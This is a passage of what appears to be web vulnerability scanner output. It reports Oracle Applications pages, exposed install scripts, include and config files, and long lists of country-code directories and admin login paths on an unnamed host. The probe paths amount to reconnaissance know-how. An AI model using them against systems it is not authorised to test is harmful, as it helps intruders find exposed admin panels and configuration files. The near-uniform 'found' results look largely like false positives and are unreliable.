  566. + OSVDB-3093: /OA_JAVA/Oracle/: Oracle Applications portal pages found.
  567. + OSVDB-3093: /OA_JAVA/servlet.zip: Oracle Applications portal pages found.
  568. + OSVDB-3093: /OA_JAVA/oracle/forms/registry/Registry.dat: Oracle Applications portal pages found.
  569. + OSVDB-3093: /OA_HTML/oam/: Oracle Applications portal pages found.
  570. + OSVDB-3233: /OA_HTML/jsp/: Oracle Applications portal page found
  571. + OSVDB-3233: /OA_HTML/jsp/fnd/fndversion.jsp: Oracle Applications help page found.
  572. + OSVDB-3233: /OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc: Oracle Applications help page found.
  573. + OSVDB-3233: /OA_HTML/jsp/fnd/fndhelputil.jsp: Oracle Applications help page found.
  574. + OSVDB-3092: /install/install.php: Install file found.
  575. + OSVDB-3092: /cehttp/trace: Sterling Commerce Connect Direct trace log file may contain user ID information.
  576. + OSVDB-3092: /cehttp/property/: Sterling Commerce Connect Direct configuration files.
  577. + OSVDB-3233: /nps/iManager.html: Novell iManager found.
  578. + OSVDB-3233: /nps/version.jsp: Novell iManager version found.
  579. + OSVDB-3233: /nps/servlet/webacc?taskId=dev.Empty&merge=fw.About: Novell iManager version found.
  580. + OSVDB-3233: /doc/icodUserGuide.pdf: Instant Capacity on Demand (iCOD) Userís Guide.
  581. + OSVDB-3233: /doc/planning_SuperDome_configs.pdf: Planning HP SuperDome Configurations
  582. + OSVDB-3233: /doc/vxvm/pitc_ag.pdf: VERITAS FlashSnapTM Point-In-Time Copy Solutions documentation.
  583. + OSVDB-3233: /doc/Judy/Judy_tech_book.pdf: HP Judy documentation found.
  584. + OSVDB-3233: /doc/vxvm/vxvm_ag.pdf: Veritas Volume Manager documentation.
  585. + OSVDB-3233: /doc/vxvm/vxvm_hwnotes.pdf: Veritas Volume Manager documentation.
  586. + OSVDB-3233: /doc/vxvm/vxvm_ig.pdf: Veritas Volume Manager documentation.
  587. + OSVDB-3233: /doc/vxvm/vxvm_mig.pdf: Veritas Volume Manager documentation.
  588. + OSVDB-3233: /doc/vxvm/vxvm_tshoot.pdf: Veritas Volume Manager documentation.
  589. + OSVDB-3233: /doc/vxvm/vxvm_notes.pdf: Veritas Volume Manager documentation.
  590. + OSVDB-3233: /doc/vxvm/vxvm_ug.pdf: Veritas Volume Manager documentation.
  591. + OSVDB-3092: /staging/: This may be interesting...
  592. + OSVDB-3092: /_archive/: Archive found.
  593. + OSVDB-3092: /INSTALL.txt: Default file found.
  594. + OSVDB-3092: /UPGRADE.txt: Default file found.
  595. + OSVDB-3092: /install.php: install.php file found.
  596. + OSVDB-3092: /LICENSE.txt: License file found may identify site software.
  597. + OSVDB-3092: /upgrade.php: upgrade.php was found.
  598. + OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
  599. + OSVDB-3092: /CHANGELOG.txt: A changelog was found.
  600. + OSVDB-3092: /sitemap.gz: The sitemap.gz file, used for Google indexing, contains an xml representation of the web site's structure.
  601. + OSVDB-3092: /content/sitemap.gz: The sitemap.gz file, used for Google indexing, contains an xml representation of the web site\'s structure.
  602. + /webservices/IlaWebServices: Host has the Oracle iLearning environment installed.
  603. + /phone/: This may be interesting...
  604. + /aspnet_files/: .NET client side script files indicate .NET may be running. See http://msdn.microsoft.com/en-us/library/aa479045.aspx#aspplusvalid_clientside
  605. + OSVDB-3092: /Admin/: This might be interesting...
  606. + OSVDB-3092: /af/: This might be interesting... potential country code (Afghanistan)
  607. + OSVDB-3092: /ax/: This might be interesting... potential country code (Aland Islands)
  608. + OSVDB-3092: /al/: This might be interesting... potential country code (Albania)
  609. + OSVDB-3092: /dz/: This might be interesting... potential country code (Algeria)
  610. + OSVDB-3092: /as/: This might be interesting... potential country code (American Samoa)
  611. + OSVDB-3092: /ad/: This might be interesting... potential country code (Andorra)
  612. + OSVDB-3092: /ao/: This might be interesting... potential country code (Angola)
  613. + OSVDB-3092: /ai/: This might be interesting... potential country code (Anguilla)
  614. + OSVDB-3092: /aq/: This might be interesting... potential country code (Antarctica)
  615. + OSVDB-3092: /ag/: This might be interesting... potential country code (Antigua And Barbuda)
  616. + OSVDB-3092: /ar/: This might be interesting... potential country code (Argentina)
  617. + OSVDB-3092: /am/: This might be interesting... potential country code (Armenia)
  618. + OSVDB-3092: /aw/: This might be interesting... potential country code (Aruba)
  619. + OSVDB-3092: /au/: This might be interesting... potential country code (Australia)
  620. + OSVDB-3092: /at/: This might be interesting... potential country code (Austria)
  621. + OSVDB-3092: /az/: This might be interesting... potential country code (Azerbaijan)
  622. + OSVDB-3092: /bs/: This might be interesting... potential country code (Bahamas)
  623. + OSVDB-3092: /bh/: This might be interesting... potential country code (Bahrain)
  624. + OSVDB-3092: /bd/: This might be interesting... potential country code (Bangladesh)
  625. + OSVDB-3092: /bb/: This might be interesting... potential country code (Barbados)
  626. + OSVDB-3092: /by/: This might be interesting... potential country code (Belarus)
  627. + OSVDB-3092: /be/: This might be interesting... potential country code (Belgium)
  628. + OSVDB-3092: /bz/: This might be interesting... potential country code (Belize)
  629. + OSVDB-3092: /bj/: This might be interesting... potential country code (Benin)
  630. + OSVDB-3092: /bm/: This might be interesting... potential country code (Bermuda)
  631. + OSVDB-3092: /bt/: This might be interesting... potential country code (Bhutan)
  632. + OSVDB-3092: /bo/: This might be interesting... potential country code (Bolivia)
  633. + OSVDB-3092: /ba/: This might be interesting... potential country code (Bosnia And Herzegovina)
  634. + OSVDB-3092: /bw/: This might be interesting... potential country code (Botswana)
  635. + OSVDB-3092: /bv/: This might be interesting... potential country code (Bouvet Island)
  636. + OSVDB-3092: /br/: This might be interesting... potential country code (Brazil)
  637. + OSVDB-3092: /io/: This might be interesting... potential country code (British Indian Ocean Territory)
  638. + OSVDB-3092: /bn/: This might be interesting... potential country code (Brunei Darussalam)
  639. + OSVDB-3092: /bg/: This might be interesting... potential country code (Bulgaria)
  640. + OSVDB-3092: /bf/: This might be interesting... potential country code (Burkina Faso)
  641. + OSVDB-3092: /bi/: This might be interesting... potential country code (Burundi)
  642. + OSVDB-3092: /kh/: This might be interesting... potential country code (Cambodia)
  643. + OSVDB-3092: /cm/: This might be interesting... potential country code (Cameroon)
  644. + OSVDB-3092: /ca/: This might be interesting... potential country code (Canada)
  645. + OSVDB-3092: /cv/: This might be interesting... potential country code (Cape Verde)
  646. + OSVDB-3092: /ky/: This might be interesting... potential country code (Cayman Islands)
  647. + OSVDB-3092: /cf/: This might be interesting... potential country code (Central African Republic)
  648. + OSVDB-3092: /td/: This might be interesting... potential country code (Chad)
  649. + OSVDB-3092: /cl/: This might be interesting... potential country code (Chile)
  650. + OSVDB-3092: /cn/: This might be interesting... potential country code (China)
  651. + OSVDB-3092: /cx/: This might be interesting... potential country code (Christmas Island)
  652. + OSVDB-3092: /cc/: This might be interesting... potential country code (Cocos (keeling) Islands)
  653. + OSVDB-3092: /co/: This might be interesting... potential country code (Colombia)
  654. + OSVDB-3092: /km/: This might be interesting... potential country code (Comoros)
  655. + OSVDB-3092: /cg/: This might be interesting... potential country code (Congo)
  656. + OSVDB-3092: /cd/: This might be interesting... potential country code (The Democratic Republic Of The Congo)
  657. + OSVDB-3092: /ck/: This might be interesting... potential country code (Cook Islands)
  658. + OSVDB-3092: /cr/: This might be interesting... potential country code (Costa Rica)
  659. + OSVDB-3092: /ci/: This might be interesting... potential country code (CÔte D'ivoire)
  660. + OSVDB-3092: /hr/: This might be interesting... potential country code (Croatia)
  661. + OSVDB-3092: /cu/: This might be interesting... potential country code (Cuba)
  662. + OSVDB-3092: /cy/: This might be interesting... potential country code (Cyprus)
  663. + OSVDB-3092: /cz/: This might be interesting... potential country code (Czech Republic)
  664. + OSVDB-3092: /dk/: This might be interesting... potential country code (Denmark)
  665. + OSVDB-3092: /dj/: This might be interesting... potential country code (Djibouti)
  666. + OSVDB-3092: /dm/: This might be interesting... potential country code (Dominica)
  667. + OSVDB-3092: /do/: This might be interesting... potential country code (Dominican Republic)
  668. + OSVDB-3092: /ec/: This might be interesting... potential country code (Ecuador)
  669. + OSVDB-3092: /eg/: This might be interesting... potential country code (Egypt)
  670. + OSVDB-3092: /sv/: This might be interesting... potential country code (El Salvador)
  671. + OSVDB-3092: /gq/: This might be interesting... potential country code (Equatorial Guinea)
  672. + OSVDB-3092: /er/: This might be interesting... potential country code (Eritrea)
  673. + OSVDB-3092: /ee/: This might be interesting... potential country code (Estonia)
  674. + OSVDB-3092: /et/: This might be interesting... potential country code (Ethiopia)
  675. + OSVDB-3092: /fk/: This might be interesting... potential country code (Falkland Islands (malvinas))
  676. + OSVDB-3092: /fo/: This might be interesting... potential country code (Faroe Islands)
  677. + OSVDB-3092: /fj/: This might be interesting... potential country code (Fiji)
  678. + OSVDB-3092: /fi/: This might be interesting... potential country code (Finland)
  679. + OSVDB-3092: /fr/: This might be interesting... potential country code (France)
  680. + OSVDB-3092: /gf/: This might be interesting... potential country code (French Guiana)
  681. + OSVDB-3092: /pf/: This might be interesting... potential country code (French Polynesia)
  682. + OSVDB-3092: /tf/: This might be interesting... potential country code (French Southern Territories)
  683. + OSVDB-3092: /ga/: This might be interesting... potential country code (Gabon)
  684. + OSVDB-3092: /gm/: This might be interesting... potential country code (Gambia)
  685. + OSVDB-3092: /ge/: This might be interesting... potential country code (Georgia)
  686. + OSVDB-3092: /de/: This might be interesting... potential country code (Germany)
  687. + OSVDB-3092: /gh/: This might be interesting... potential country code (Ghana)
  688. + OSVDB-3092: /gi/: This might be interesting... potential country code (Gibraltar)
  689. + OSVDB-3092: /gr/: This might be interesting... potential country code (Greece)
  690. + OSVDB-3092: /gl/: This might be interesting... potential country code (Greenland)
  691. + OSVDB-3092: /gd/: This might be interesting... potential country code (Grenada)
  692. + OSVDB-3092: /gp/: This might be interesting... potential country code (Guadeloupe)
  693. + OSVDB-3092: /gu/: This might be interesting... potential country code (Guam)
  694. + OSVDB-3092: /gt/: This might be interesting... potential country code (Guatemala)
  695. + OSVDB-3092: /gg/: This might be interesting... potential country code (Guernsey)
  696. + OSVDB-3092: /gn/: This might be interesting... potential country code (Guinea)
  697. + OSVDB-3092: /gw/: This might be interesting... potential country code (Guinea-bissau)
  698. + OSVDB-3092: /gy/: This might be interesting... potential country code (Guyana)
  699. + OSVDB-3092: /ht/: This might be interesting... potential country code (Haiti)
  700. + OSVDB-3092: /hm/: This might be interesting... potential country code (Heard Island And Mcdonald Islands)
  701. + OSVDB-3092: /va/: This might be interesting... potential country code (Holy See (vatican City State))
  702. + OSVDB-3092: /hn/: This might be interesting... potential country code (Honduras)
  703. + OSVDB-3092: /hk/: This might be interesting... potential country code (Hong Kong)
  704. + OSVDB-3092: /hu/: This might be interesting... potential country code (Hungary)
  705. + OSVDB-3092: /is/: This might be interesting... potential country code (Iceland)
  706. + OSVDB-3092: /in/: This might be interesting... potential country code (India)
  707. + OSVDB-3092: /id/: This might be interesting... potential country code (Indonesia)
  708. + OSVDB-3092: /ir/: This might be interesting... potential country code (Islamic Republic Of Iran)
  709. + OSVDB-3092: /iq/: This might be interesting... potential country code (Iraq)
  710. + OSVDB-3092: /ie/: This might be interesting... potential country code (Ireland)
  711. + OSVDB-3092: /im/: This might be interesting... potential country code (Isle Of Man)
  712. + OSVDB-3092: /il/: This might be interesting... potential country code (Israel)
  713. + OSVDB-3092: /it/: This might be interesting... potential country code (Italy)
  714. + OSVDB-3092: /jm/: This might be interesting... potential country code (Jamaica)
  715. + OSVDB-3092: /jp/: This might be interesting... potential country code (Japan)
  716. + OSVDB-3092: /je/: This might be interesting... potential country code (Jersey)
  717. + OSVDB-3092: /jo/: This might be interesting... potential country code (Jordan)
  718. + OSVDB-3092: /kz/: This might be interesting... potential country code (Kazakhstan)
  719. + OSVDB-3092: /ke/: This might be interesting... potential country code (Kenya)
  720. + OSVDB-3092: /ki/: This might be interesting... potential country code (Kiribati)
  721. + OSVDB-3092: /kp/: This might be interesting... potential country code (Democratic People's Republic Of Korea)
  722. + OSVDB-3092: /kr/: This might be interesting... potential country code (Republic Of Korea)
  723. + OSVDB-3092: /kw/: This might be interesting... potential country code (Kuwait)
  724. + OSVDB-3092: /kg/: This might be interesting... potential country code (Kyrgyzstan)
  725. + OSVDB-3092: /la/: This might be interesting... potential country code (Lao People's Democratic Republic)
  726. + OSVDB-3092: /lv/: This might be interesting... potential country code (Latvia)
  727. + OSVDB-3092: /lb/: This might be interesting... potential country code (Lebanon)
  728. + OSVDB-3092: /ls/: This might be interesting... potential country code (Lesotho)
  729. + OSVDB-3092: /lr/: This might be interesting... potential country code (Liberia)
  730. + OSVDB-3092: /ly/: This might be interesting... potential country code (Libyan Arab Jamahiriya)
  731. + OSVDB-3092: /li/: This might be interesting... potential country code (Liechtenstein)
  732. + OSVDB-3092: /lt/: This might be interesting... potential country code (Lithuania)
  733. + OSVDB-3092: /lu/: This might be interesting... potential country code (Luxembourg)
  734. + OSVDB-3092: /mo/: This might be interesting... potential country code (Macao)
  735. + OSVDB-3092: /mk/: This might be interesting... potential country code (Macedonia)
  736. + OSVDB-3092: /mg/: This might be interesting... potential country code (Madagascar)
  737. + OSVDB-3092: /mw/: This might be interesting... potential country code (Malawi)
  738. + OSVDB-3092: /my/: This might be interesting... potential country code (Malaysia)
  739. + OSVDB-3092: /mv/: This might be interesting... potential country code (Maldives)
  740. + OSVDB-3092: /ml/: This might be interesting... potential country code (Mali)
  741. + OSVDB-3092: /mt/: This might be interesting... potential country code (Malta)
  742. + OSVDB-3092: /mh/: This might be interesting... potential country code (Marshall Islands)
  743. + OSVDB-3092: /mq/: This might be interesting... potential country code (Martinique)
  744. + OSVDB-3092: /mr/: This might be interesting... potential country code (Mauritania)
  745. + OSVDB-3092: /mu/: This might be interesting... potential country code (Mauritius)
  746. + OSVDB-3092: /yt/: This might be interesting... potential country code (Mayotte)
  747. + OSVDB-3092: /mx/: This might be interesting... potential country code (Mexico)
  748. + OSVDB-3092: /fm/: This might be interesting... potential country code (Federated States Of Micronesia)
  749. + OSVDB-3092: /md/: This might be interesting... potential country code (Republic Of Moldova)
  750. + OSVDB-3092: /mc/: This might be interesting... potential country code (Monaco)
  751. + OSVDB-3092: /mn/: This might be interesting... potential country code (Mongolia)
  752. + OSVDB-3092: /me/: This might be interesting... potential country code (Montenegro)
  753. + OSVDB-3092: /ms/: This might be interesting... potential country code (Montserrat)
  754. + OSVDB-3092: /ma/: This might be interesting... potential country code (Morocco)
  755. + OSVDB-3092: /mz/: This might be interesting... potential country code (Mozambique)
  756. + OSVDB-3092: /mm/: This might be interesting... potential country code (Myanmar)
  757. + OSVDB-3092: /na/: This might be interesting... potential country code (Namibia)
  758. + OSVDB-3092: /nr/: This might be interesting... potential country code (Nauru)
  759. + OSVDB-3092: /np/: This might be interesting... potential country code (Nepal)
  760. + OSVDB-3092: /nl/: This might be interesting... potential country code (Netherlands)
  761. + OSVDB-3092: /an/: This might be interesting... potential country code (Netherlands Antilles)
  762. + OSVDB-3092: /nc/: This might be interesting... potential country code (New Caledonia)
  763. + OSVDB-3092: /nz/: This might be interesting... potential country code (New Zealand)
  764. + OSVDB-3092: /ni/: This might be interesting... potential country code (Nicaragua)
  765. + OSVDB-3092: /ne/: This might be interesting... potential country code (Niger)
  766. + OSVDB-3092: /ng/: This might be interesting... potential country code (Nigeria)
  767. + OSVDB-3092: /nu/: This might be interesting... potential country code (Niue)
  768. + OSVDB-3092: /nf/: This might be interesting... potential country code (Norfolk Island)
  769. + OSVDB-3092: /mp/: This might be interesting... potential country code (Northern Mariana Islands)
  770. + OSVDB-3092: /no/: This might be interesting... potential country code (Norway)
  771. + OSVDB-3092: /om/: This might be interesting... potential country code (Oman)
  772. + OSVDB-3092: /pk/: This might be interesting... potential country code (Pakistan)
  773. + OSVDB-3092: /pw/: This might be interesting... potential country code (Palau)
  774. + OSVDB-3092: /ps/: This might be interesting... potential country code (Palestinian Territory)
  775. + OSVDB-3092: /pa/: This might be interesting... potential country code (Panama)
  776. + OSVDB-3092: /pg/: This might be interesting... potential country code (Papua New Guinea)
  777. + OSVDB-3092: /py/: This might be interesting... potential country code (Paraguay)
  778. + OSVDB-3092: /pe/: This might be interesting... potential country code (Peru)
  779. + OSVDB-3092: /ph/: This might be interesting... potential country code (Philippines)
  780. + OSVDB-3092: /pn/: This might be interesting... potential country code (Pitcairn)
  781. + OSVDB-3092: /pl/: This might be interesting... potential country code (Poland)
  782. + OSVDB-3092: /pt/: This might be interesting... potential country code (Portugal)
  783. + OSVDB-3092: /pr/: This might be interesting... potential country code (Puerto Rico)
  784. + OSVDB-3092: /qa/: This might be interesting... potential country code (Qatar)
  785. + OSVDB-3092: /re/: This might be interesting... potential country code (RÉunion)
  786. + OSVDB-3092: /ro/: This might be interesting... potential country code (Romania)
  787. + OSVDB-3092: /ru/: This might be interesting... potential country code (Russian Federation)
  788. + OSVDB-3092: /rw/: This might be interesting... potential country code (Rwanda)
  789. + OSVDB-3092: /bl/: This might be interesting... potential country code (Saint BarthÉlemy)
  790. + OSVDB-3092: /sh/: This might be interesting... potential country code (Saint Helena)
  791. + OSVDB-3092: /kn/: This might be interesting... potential country code (Saint Kitts And Nevis)
  792. + OSVDB-3092: /lc/: This might be interesting... potential country code (Saint Lucia)
  793. + OSVDB-3092: /mf/: This might be interesting... potential country code (Saint Martin)
  794. + OSVDB-3092: /pm/: This might be interesting... potential country code (Saint Pierre And Miquelon)
  795. + OSVDB-3092: /vc/: This might be interesting... potential country code (Saint Vincent And The Grenadines)
  796. + OSVDB-3092: /ws/: This might be interesting... potential country code (Samoa)
  797. + OSVDB-3092: /sm/: This might be interesting... potential country code (San Marino)
  798. + OSVDB-3092: /st/: This might be interesting... potential country code (Sao Tome And Principe)
  799. + OSVDB-3092: /sa/: This might be interesting... potential country code (Saudi Arabia)
  800. + OSVDB-3092: /sn/: This might be interesting... potential country code (Senegal)
  801. + OSVDB-3092: /rs/: This might be interesting... potential country code (Serbia)
  802. + OSVDB-3092: /sc/: This might be interesting... potential country code (Seychelles)
  803. + OSVDB-3092: /sl/: This might be interesting... potential country code (Sierra Leone)
  804. + OSVDB-3092: /sg/: This might be interesting... potential country code (Singapore)
  805. + OSVDB-3092: /sk/: This might be interesting... potential country code (Slovakia)
  806. + OSVDB-3092: /si/: This might be interesting... potential country code (Slovenia)
  807. + OSVDB-3092: /sb/: This might be interesting... potential country code (Solomon Islands)
  808. + OSVDB-3092: /so/: This might be interesting... potential country code (Somalia)
  809. + OSVDB-3092: /za/: This might be interesting... potential country code (South Africa)
  810. + OSVDB-3092: /gs/: This might be interesting... potential country code (South Georgia And The South Sandwich Islands)
  811. + OSVDB-3092: /es/: This might be interesting... potential country code (Spain)
  812. + OSVDB-3092: /lk/: This might be interesting... potential country code (Sri Lanka)
  813. + OSVDB-3092: /sd/: This might be interesting... potential country code (Sudan)
  814. + OSVDB-3092: /sr/: This might be interesting... potential country code (Suriname)
  815. + OSVDB-3092: /sj/: This might be interesting... potential country code (Svalbard And Jan Mayen)
  816. + OSVDB-3092: /sz/: This might be interesting... potential country code (Swaziland)
  817. + OSVDB-3092: /se/: This might be interesting... potential country code (Sweden)
  818. + OSVDB-3092: /ch/: This might be interesting... potential country code (Switzerland)
  819. + OSVDB-3092: /sy/: This might be interesting... potential country code (Syrian Arab Republic)
  820. + OSVDB-3092: /tw/: This might be interesting... potential country code (Taiwan)
  821. + OSVDB-3092: /tj/: This might be interesting... potential country code (Tajikistan)
  822. + OSVDB-3092: /tz/: This might be interesting... potential country code (United Republic Of Tanzania)
  823. + OSVDB-3092: /th/: This might be interesting... potential country code (Thailand)
  824. + OSVDB-3092: /tl/: This might be interesting... potential country code (Timor-leste)
  825. + OSVDB-3092: /tg/: This might be interesting... potential country code (Togo)
  826. + OSVDB-3092: /tk/: This might be interesting... potential country code (Tokelau)
  827. + OSVDB-3092: /to/: This might be interesting... potential country code (Tonga)
  828. + OSVDB-3092: /tt/: This might be interesting... potential country code (Trinidad And Tobago)
  829. + OSVDB-3092: /tn/: This might be interesting... potential country code (Tunisia)
  830. + OSVDB-3092: /tr/: This might be interesting... potential country code (Turkey)
  831. + OSVDB-3092: /tm/: This might be interesting... potential country code (Turkmenistan)
  832. + OSVDB-3092: /tc/: This might be interesting... potential country code (Turks And Caicos Islands)
  833. + OSVDB-3092: /tv/: This might be interesting... potential country code (Tuvalu)
  834. + OSVDB-3092: /ug/: This might be interesting... potential country code (Uganda)
  835. + OSVDB-3092: /ua/: This might be interesting... potential country code (Ukraine)
  836. + OSVDB-3092: /ae/: This might be interesting... potential country code (United Arab Emirates)
  837. + OSVDB-3092: /gb/: This might be interesting... potential country code (United Kingdom)
  838. + OSVDB-3092: /us/: This might be interesting... potential country code (United States)
  839. + OSVDB-3092: /um/: This might be interesting... potential country code (United States Minor Outlying Islands)
  840. + OSVDB-3092: /uy/: This might be interesting... potential country code (Uruguay)
  841. + OSVDB-3092: /uz/: This might be interesting... potential country code (Uzbekistan)
  842. + OSVDB-3092: /vu/: This might be interesting... potential country code (Vanuatu)
  843. + OSVDB-3092: /ve/: This might be interesting... potential country code (Venezuela)
  844. + OSVDB-3092: /vn/: This might be interesting... potential country code (Viet Nam)
  845. + OSVDB-3092: /vg/: This might be interesting... potential country code (British Virgin Islands)
  846. + OSVDB-3092: /vi/: This might be interesting... potential country code (U.S. Virgin Islands)
  847. + OSVDB-3092: /wf/: This might be interesting... potential country code (Wallis And Futuna)
  848. + OSVDB-3092: /eh/: This might be interesting... potential country code (Western Sahara)
  849. + OSVDB-3092: /ye/: This might be interesting... potential country code (Yemen)
  850. + OSVDB-3092: /zm/: This might be interesting... potential country code (Zambia)
  851. + OSVDB-3092: /zw/: This might be interesting... potential country code (Zimbabwe)
  852. + OSVDB-3092: /www/2: This might be interesting...
  853. + OSVDB-3093: /includes/db.inc: Include files (.inc) should not be served in plain text.
  854. + OSVDB-3093: /includes/sendmail.inc: Include files (.inc) should not be served in plain text.
  855. + OSVDB-3092: /license.txt: License file found may identify site software.
  856. + OSVDB-3092: /install.txt: Install file found may identify site software.
  857. + OSVDB-3092: /LICENSE.TXT: License file found may identify site software.
  858. + OSVDB-3092: /INSTALL.TXT: Install file found may identify site software.
  859. + /config/config.txt: Configuration file found.
  860. + /config/readme.txt: Readme file found.
  861. + /data/readme.txt: Readme file found.
  862. + /log/readme.txt: Readme file found.
  863. + /logs/readme.txt: Readme file found.
  864. + /uploads/readme.txt: Readme file found.
  865. + /admin1.php: Admin login page found.
  866. + /admin.asp: Admin login page/section found.
  867. + /admin/account.asp: Admin login page/section found.
  868. + /admin/account.html: Admin login page/section found.
  869. + /admin/account.php: Admin login page/section found.
  870. + /admin/controlpanel.asp: Admin login page/section found.
  871. + /admin/controlpanel.html: Admin login page/section found.
  872. + /admin/controlpanel.php: Admin login page/section found.
  873. + /admin/cp.asp: Admin login page/section found.
  874. + /admin/cp.html: Admin login page/section found.
  875. + /admin/cp.php: Admin login page/section found.
  876. + /admin/home.asp: Admin login page/section found.
  877. + /admin/home.php: Admin login page/section found.
  878. + /admin/index.asp: Admin login page/section found.
  879. + /admin/index.html: Admin login page/section found.
  880. + /admin/login.asp: Admin login page/section found.
  881. + /admin/login.html: Admin login page/section found.
  882. + /admin/login.php: Admin login page/section found.
  883. + /admin1.asp: Admin login page/section found.
  884. + /admin1.html: Admin login page/section found.
  885. + /admin1/: Admin login page/section found.
  886. + /admin2.asp: Admin login page/section found.
  887. + /admin2.html: Admin login page/section found.
  888. + /admin2.php: Admin login page/section found.
  889. + /admin4_account/: Admin login page/section found.
  890. + /admin4_colon/: Admin login page/section found.
  891. + /admincontrol.asp: Admin login page/section found.
  892. + /admincontrol.html: Admin login page/section found.
  893. + /admincontrol.php: Admin login page/section found.
  894. + /administer/: Admin login page/section found.
  895. + /administr8.asp: Admin login page/section found.
  896. + /administr8.html: Admin login page/section found.
  897. + /administr8.php: Admin login page/section found.
  898. + /administr8/: Admin login page/section found.
  899. + /administracao.php: Admin login page/section found.
  900. + /administraçao.php: Admin login page/section found.
  901. + /administracao/: Admin login page/section found.
  902. + /administraçao/: Admin login page/section found.
  903. + /administracion.php: Admin login page/section found.
  904. + /administracion/: Admin login page/section found.
  905. + /administrateur.php: Admin login page/section found.
  906. + /administrateur/: Admin login page/section found.
  907. + /administratie/: Admin login page/section found.
  908. + /administration.html: Admin login page/section found.
  909. + /administration.php: Admin login page/section found.
  910. + /administration/: Admin login page/section found.
  911. + /administrator.asp: Admin login page/section found.
  912. + /administrator.html: Admin login page/section found.
  913. + /administrator.php: Admin login page/section found.
  914. + /administrator/account.asp: Admin login page/section found.
  915. + /administrator/account.html: Admin login page/section found.
  916. + /administrator/account.php: Admin login page/section found.
  917. + /administrator/index.asp: Admin login page/section found.
  918. + /administrator/index.html: Admin login page/section found.
  919. + /administrator/index.php: Admin login page/section found.
  920. + /administrator/login.asp: Admin login page/section found.
  921. + /administrator/login.html: Admin login page/section found.
  922. + /administrator/login.php: Admin login page/section found.
  923. + /administratoraccounts/: Admin login page/section found.
  924. + /administrators/: Admin login page/section found.
  925. + /administrivia/: Admin login page/section found.
  926. + /adminisztrátora.php: Admin login page/section found.
  927. + /adminisztrátora/: Admin login page/section found.
  928. + /adminpanel.asp: Admin login page/section found.
  929. + /adminpanel.html: Admin login page/section found.
  930. + /adminpanel.php: Admin login page/section found.
  931. + /adminpro/: Admin login page/section found.
  932. + /admins.asp: Admin login page/section found.
  933. + /admins.html: Admin login page/section found.
  934. + /admins.php: Admin login page/section found.
  935. + /admins/: Admin login page/section found.
  936. + /AdminTools/: Admin login page/section found.
  937. + /amministratore.php: Admin login page/section found.
  938. + /amministratore/: Admin login page/section found.
  939. + /autologin/: Admin login page/section found.
  940. + /banneradmin/: Admin login page/section found.
  941. + /bbadmin/: Admin login page/section found.
  942. + /beheerder.php: Admin login page/section found.
  943. + /beheerder/: Admin login page/section found.
  944. + /bigadmin/: Admin login page/section found.
  945. + /blogindex/: Admin login page/section found.
  946. + /cadmins/: Admin login page/section found.
  947. + /ccms/: Admin login page/section found.
  948. + /ccms/index.php: Admin login page/section found.
  949. + /ccms/login.php: Admin login page/section found.
  950. + /ccp14admin/: Admin login page/section found.
  951. + /cmsadmin/: Admin login page/section found.
  952. + /configuration/: Admin login page/section found.
  953. + /configure/: Admin login page/section found.
  954. + /controlpanel.asp: Admin login page/section found.
  955. + /controlpanel.html: Admin login page/section found.
  956. + /controlpanel.php: Admin login page/section found.
  957. + /controlpanel/: Admin login page/section found.
  958. + /cp.asp: Admin login page/section found.
  959. + /cp.html: Admin login page/section found.
  960. + /cp.php: Admin login page/section found.
  961. + /cpanel_file/: Admin login page/section found.
  962. + /customer_login/: Admin login page/section found.
  963. + /database_administration/: Admin login page/section found.
  964. + /Database_Administration/: Admin login page/section found.
  965. + /dir-login/: Admin login page/section found.
  966. + /directadmin/: Admin login page/section found.
  967. + /ezsqliteadmin/: Admin login page/section found.
  968. + /fileadmin.asp: Admin login page/section found.
  969. + /fileadmin.html: Admin login page/section found.
  970. + /fileadmin.php: Admin login page/section found.
  971. + /formslogin/: Admin login page/section found.
  972. + /globes_admin/: Admin login page/section found.
  973. + /hpwebjetadmin/: Admin login page/section found.
  974. + /Indy_admin/: Admin login page/section found.
  975. + /irc-macadmin/: Admin login page/section found.
  976. + /LiveUser_Admin/: Admin login page/section found.
  977. + /login_db/: Admin login page/section found.
  978. + /login-redirect/: Admin login page/section found.
  979. + /login-us/: Admin login page/section found.
  980. + /login.asp: Admin login page/section found.
  981. + /login.html: Admin login page/section found.
  982. + /login.php: Admin login page/section found.
  983. + /login1/: Admin login page/section found.
  984. + /loginflat/: Admin login page/section found.
  985. + /logo_sysadmin/: Admin login page/section found.
  986. + /Lotus_Domino_Admin/: Admin login page/section found.
  987. + /macadmin/: Admin login page/section found.
  988. + /maintenance/: Admin login page/section found.
  989. + /manuallogin/: Admin login page/section found.
  990. + /memlogin/: Admin login page/section found.
  991. + /meta_login/: Admin login page/section found.
  992. + /modelsearch/login.asp: Admin login page/section found.
  993. + /modelsearch/login.php: Admin login page/section found.
  994. + /moderator.asp: Admin login page/section found.
  995. + /moderator.html: Admin login page/section found.
  996. + /moderator.php: Admin login page/section found.
  997. + /moderator/: Admin login page/section found.
  998. + /moderator/admin.asp: Admin login page/section found.
  999. + /moderator/admin.html: Admin login page/section found.
  1000. + /moderator/admin.php: Admin login page/section found.
  1001. + /moderator/login.asp: Admin login page/section found.
  1002. + /moderator/login.html: Admin login page/section found.
  1003. + /moderator/login.php: Admin login page/section found.
  1004. + /myadmin/: Admin login page/section found.
  1005. + /navSiteAdmin/: Admin login page/section found.
  1006. + /newsadmin/: Admin login page/section found.
  1007. + /openvpnadmin/: Admin login page/section found.
  1008. + /painel/: Admin login page/section found.
  1009. + /panel/: Admin login page/section found.
  1010. + /pgadmin/: Admin login page/section found.
  1011. + /phpldapadmin/: Admin login page/section found.
  1012. + /phppgadmin/: Admin login page/section found.
  1013. + /phpSQLiteAdmin/: Admin login page/section found.
  1014. + /platz_login/: Admin login page/section found.
  1015. + /power_user/: Admin login page/section found.
  1016. + /project-admins/: Admin login page/section found.
  1017. + /pureadmin/: Admin login page/section found.
  1018. + /radmind-1/: Admin login page/section found.
  1019. + /radmind/: Admin login page/section found.
  1020. + /rcLogin/: Admin login page/section found.
  1021. + /server_admin_small/: Admin login page/section found.
  1022. + /Server.asp: Admin login page/section found.
  1023. + /Server.html: Admin login page/section found.
  1024. + /Server.php: Admin login page/section found.
  1025. + /ServerAdministrator/: Admin login page/section found.
  1026. + /showlogin/: Admin login page/section found.
  1027. + /simpleLogin/: Admin login page/section found.
  1028. + /smblogin/: Admin login page/section found.
  1029. + /sql-admin/: Admin login page/section found.
